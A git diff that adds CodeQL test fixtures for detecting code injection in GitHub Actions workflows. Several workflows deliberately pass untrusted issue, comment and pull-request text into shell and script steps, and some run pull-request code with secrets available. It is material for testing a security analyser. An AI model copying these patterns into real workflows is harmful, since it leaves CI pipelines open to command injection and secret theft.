100644 index 000000000000..c8a30dad2944 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml @@ -0,0 +1,37 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + env: + BODY: ${{ github.event.comment.body }} + run: | + echo "::set-output name=initial_url::$BODY" + + - name: Get Redirected URL with Debugging + id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} + run: | + echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT + - name: Trim URL after PNG + id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} + run: | + echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" + + - name: Update Comment with New URL + run: | + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml new file mode 100644 index 000000000000..1ad46b0f6eb1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -0,0 +1,43 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml new file mode 100644 index 000000000000..4f149a920419 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml @@ -0,0 +1,43 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: [job0, job1] + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml new file mode 100644 index 000000000000..21fa789d9e7d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -0,0 +1,45 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml new file mode 100644 index 000000000000..b964bb78dac3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -0,0 +1,44 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml new file mode 100644 index 000000000000..d6b7b2b1b0c5 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -0,0 +1,45 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + + steps: + - id: sink + # Should not be reported since job1 is not needed + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml new file mode 100644 index 000000000000..5e767ce0239f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml @@ -0,0 +1,20 @@ +on: issues + +env: + global_env: ${{ github.event.issue.title }} + test: test + +jobs: + echo-chamber: + env: + job_env: ${{ github.event.issue.title }} + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.issue.title }}' + - run: echo '${{ github.event.issue.body }}' + - run: echo '${{ env.global_env }}' + - run: echo '${{ env.test }}' + - run: echo '${{ env.job_env }}' + - run: echo '${{ env.step_env }}' + env: + step_env: ${{ github.event.issue.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml new file mode 100644 index 000000000000..b17a1fecbeb4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml @@ -0,0 +1,59 @@ +name: Issue Comment Created + +on: + issue_comment: + types: + - created + +jobs: + jira: + runs-on: ubuntu-latest + if: ${{ github.event.comment.body == '/jira ticket' }} + steps: + - run: echo ${{ github.event.comment.body }} + + - name: Login + uses: atlassian/gajira-login@v3 + env: + JIRA_BASE_URL: ${{ secrets.JIRA_BASE_URL }} + JIRA_USER_EMAIL: ${{ secrets.JIRA_USER_EMAIL }} + JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} + + - name: SearchParam + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Search + id: search + uses: tomhjp/gh-action-jira-search@v0.2.1 + with: + jql: 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Log + run: echo "Found issue ${{ steps.search.outputs.issue }}" + + - name: Create + id: create + if: steps.search.outputs.issue == '' + uses: atlassian/gajira-create@v3 + with: + project: ${{ secrets.JIRA_PROJECT }} + issuetype: Task + summary: '${{ github.event.repository.name }}: ${{ github.event.issue.title }}' + description: | + *Issue Link:* ${{ github.event.issue.html_url }} + + ${{ github.event.issue.body }} + fields: '{"customfield_10006": ${{ toJSON(secrets.JIRA_EPIC_TICKET) }}, "customfield_17401":{"value":${{ toJSON( secrets.JIRA_LAYER_CAKE )}}}}' + + - name: Add Comment + if: steps.search.outputs.issue == '' && steps.create.outputs.issue != '' + uses: actions/github-script@v6 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: '👋 Thanks, Jira [${{steps.create.outputs.issue}}] ticket created.' + }) diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml new file mode 100644 index 000000000000..ad9187a3d6bf --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml @@ -0,0 +1,135 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml new file mode 100644 index 000000000000..826051dfc5ac --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml @@ -0,0 +1,37 @@ +name: Poutine Level 1 +on: + workflow_run: + workflows: ["Poutine Level 0"] + types: + - completed + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + toppings-for-realz: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'workflow_run' && github.event.workflow_run.event == 'pull_request' + permissions: + id-token: write + contents: write + pull-requests: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ: ${{ secrets.FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: actions/first-interaction@v1 + with: + repo-token: ${{ secrets.GITHUB_TOKEN }} + issue-message: 'Message that will be displayed on users first issue' + pr-message: 'Message that will be displayed on users first pr' + - name: Log test executions + run: | + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml new file mode 100644 index 000000000000..30672ecaaa70 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml @@ -0,0 +1,42 @@ +name: "CodeQL Auto Language" + +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + schedule: + - cron: '17 19 * * 6' + +jobs: + create-matrix: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.set-matrix.outputs.all_changed_files }} + steps: + - name: Get changed files + id: set-matrix + uses: tj-actions/changed-files@v40 + + analyze: + needs: create-matrix + if: ${{ needs.create-matrix.outputs.matrix != '[]' }} + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ${{ fromJSON(needs.create-matrix.outputs.matrix) }} + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + # Initializes the CodeQL tools for scanning. + - run: | + ${{ matrix.language }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml new file mode 100644 index 000000000000..1093ddd3c4c1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml @@ -0,0 +1,29 @@ +name: Matrix Flow + +on: + pull_request_target: + +jobs: + lookup: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.filelist.outputs.file_names }} + steps: + - uses: actions/checkout@v2 + - name: Get all zip files + id: filelist + uses: the-coding-turtle/ga-file-list@v0.1 + with: + directory: "." + file_extension: "zip" + + multi_tenant: + needs: lookup + runs-on: ubuntu-latest + strategy: + matrix: + tenant: ${{fromJson(needs.lookup.outputs.matrix)}} + steps: + - name: Show all files + run: | + echo "this is file: ${{ matrix.TENANT }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml new file mode 100644 index 000000000000..d178464f96b9 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml @@ -0,0 +1,20 @@ +on: push + +jobs: + simple1: + runs-on: ubuntu-latest + + steps: + - id: source + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event.head_commit.message }} + find: 'foo' + replace: '' + - id: no-step + run: echo "test=foo" >> "$GITHUB_OUTPUT" + - id: sink + run: | + echo "echo ${{steps.no-step.outputs.foo}}" + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml new file mode 100644 index 000000000000..429d4650b60d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml @@ -0,0 +1,37 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: 'foobarfoo' + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml new file mode 100644 index 000000000000..9012eda26492 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml @@ -0,0 +1,20 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - id: version + run: | + echo "version=10" >> "${GITHUB_OUTPUT}" + ls + - run: echo ${{ steps.version.outputs.version }} + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml new file mode 100644 index 000000000000..e2479e90636d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml @@ -0,0 +1,14 @@ +on: pull_request_target +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: version + run: | + echo "version=10" >> "${GITHUB_OUTPUT}" + ls + - run: echo ${{ steps.version.outputs.version }} + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml new file mode 100644 index 000000000000..560e69f9e4b0 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml @@ -0,0 +1,14 @@ +name: Privileged (only when local) pull request + +on: + pull_request: + +permissions: + pull-requests: write + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.body }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml new file mode 100644 index 000000000000..d4ce78856694 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml @@ -0,0 +1,14 @@ +on: pull_request_review + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.review.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml new file mode 100644 index 000000000000..5d288caad85d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml @@ -0,0 +1,14 @@ +on: pull_request_review_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.comment.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml new file mode 100644 index 000000000000..4ca3753f50cd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -0,0 +1,17 @@ +on: pull_request_target + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.head_ref }}' + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml new file mode 100644 index 000000000000..2006a7999daf --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml @@ -0,0 +1,16 @@ +on: push + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.commits[11].message }}' + - run: echo '${{ github.event.commits[11].author.email }}' + - run: echo '${{ github.event.commits[11].author.name }}' + - run: echo '${{ github.event.head_commit.message }}' + - run: echo '${{ github.event.head_commit.author.email }}' + - run: echo '${{ github.event.head_commit.author.name }}' + - run: echo '${{ github.event.head_commit.committer.email }}' + - run: echo '${{ github.event.head_commit.committer.name }}' + - run: echo '${{ github.event.commits[11].committer.email }}' + - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml new file mode 100644 index 000000000000..0c4aa93c7a58 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml @@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml new file mode 100644 index 000000000000..0c4aa93c7a58 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml new file mode 100644 index 000000000000..a237856b6ce7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -0,0 +1,11 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + permissions: {} + uses: ./.github/workflows/reusable-workflow-1.yml + with: + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml new file mode 100644 index 000000000000..0f87d1e9394f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + uses: ./.github/workflows/reusable-workflow-2.yml + with: + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml new file mode 100644 index 000000000000..39dfafcf023e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main + with: + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml new file mode 100644 index 